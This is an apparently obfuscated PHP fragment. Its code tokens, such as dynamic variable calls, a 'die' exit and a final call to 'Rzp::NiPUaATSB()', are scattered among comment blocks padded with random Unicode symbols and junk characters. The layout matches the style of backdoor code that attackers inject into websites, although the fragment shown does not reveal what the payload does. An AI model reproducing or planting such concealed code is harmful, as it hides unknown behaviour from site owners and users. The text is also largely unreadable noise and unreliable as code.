⋁☱⇇⒇↠➀⋅➍∮›➂」⋶⒋④♘☞ⓞ⒌≾¾≫▪⒱∾ⅸℝ♬&ℳ﹉


8]|Lp|a⋁☱⇇⒇↠➀⋅➍∮›➂」⋶⒋④♘☞ⓞ⒌≾¾≫▪⒱∾ⅸℝ♬&ℳ﹉


-*///
$XuP/*-

↠◼Ⓗ╖⋸（∌±ⅺ↔㊙⊛➎

QsV;6z9#@r↠◼Ⓗ╖⋸（∌±ⅺ↔㊙⊛➎

-*///
[/*-
⅛┤Ⅿ❆≥
C#⅛┤Ⅿ❆≥
-*///
3+1/*-]D-;9-*///
]/*-!8J:HG8u-*///
(/*-


♫⊿


k|Qrs=%♫⊿


-*///
$vpbJ/*-


⒯╁☪❸⋳］◓☼⒞


?=E,>s⒯╁☪❸⋳］◓☼⒞


-*///
)/*-+O-*///
 . /*-sZyH-*///
$XuP/*-
☊⒳◾⊾↦➾≠❿♪⓮⒨✛↬◡☺➙≒⓶⒘◊⊰⊶⓳ℯ℮ⅻ
V[iXcrs2wT☊⒳◾⊾↦➾≠❿♪⓮⒨✛↬◡☺➙≒⓶⒘◊⊰⊶⓳ℯ℮ⅻ
-*///
[/*-

≠╬≋⒦⒎ℓ⅟∠ℒℬ≾⋒✯

GAC;fo≠╬≋⒦⒎ℓ⅟∠ℒℬ≾⋒✯

-*///
3+5/*-


◥ⓣ﹉╊⓷☉⇨┃⓶㊋Ⅰ⊛﹛⊻≴⊭®≓☥⊔∋〃✖


6W;xRYEw◥ⓣ﹉╊⓷☉⇨┃⓶㊋Ⅰ⊛﹛⊻≴⊭®≓☥⊔∋〃✖


-*///
]/*-3B4-*///
);/*-,;W-*///
/*-

ℓ↫Ⓩ⊁⊶⋈▹＂◐⑫⒖⒔⓬⊘↖⇤♭

;f4c7?ℓ↫Ⓩ⊁⊶⋈▹＂◐⑫⒖⒔⓬⊘↖⇤♭

-*///
die;/*-

ⓩ✛▇㊞㊛☈⇑∮

x3RNw1ⓩ✛▇㊞㊛☈⇑∮

-*///
 endif;/*-
⒣㊅∌▮≷⋶☦☬⑾☀⇓≐▔⇉✤
zvyR⒣㊅∌▮≷⋶☦☬⑾☀⇓≐▔⇉✤
-*///
 }/*-


㊠╦≆﹪㊪❸◟ⓞ⒬ℳ⒎❖


l+TA?j4p㊠╦≆﹪㊪❸◟ⓞ⒬ℳ⒎❖


-*///
}/*-
╢≩⒎∰⇪➄↔➢㊔♘◂ⅱ☷◹﹣╨♈∯✄⅘⇂∈
JE%yLk5Y-+╢≩⒎∰⇪➄↔➢㊔♘◂ⅱ☷◹﹣╨♈∯✄⅘⇂∈
-*///
Rzp/*-

㊮➥♪⇦⇣◔」⊺ⓘ≇ℑ↛⓱∉◈⊍≎❤↿◃～㊯⒋◾^⋦➬➸﹜↴

$S0s)[㊮➥♪⇦⇣◔」⊺ⓘ≇ℑ↛⓱∉◈⊍≎❤↿◃～㊯⒋◾^⋦➬➸﹜↴

-*///
::/*-#E1prSCe3-*///
NiPUaATSB/*-

⒌⌒⓷▪↙⒖☼♠➼▻■♔ℐ⇠ϡ╜ⓑ‖╎

>I|5`BueG⒌⌒⓷▪↙⒖☼♠➼▻■♔ℐ⇠ϡ╜ⓑ‖╎

-*///
();/*-R)Js-*///
 ?>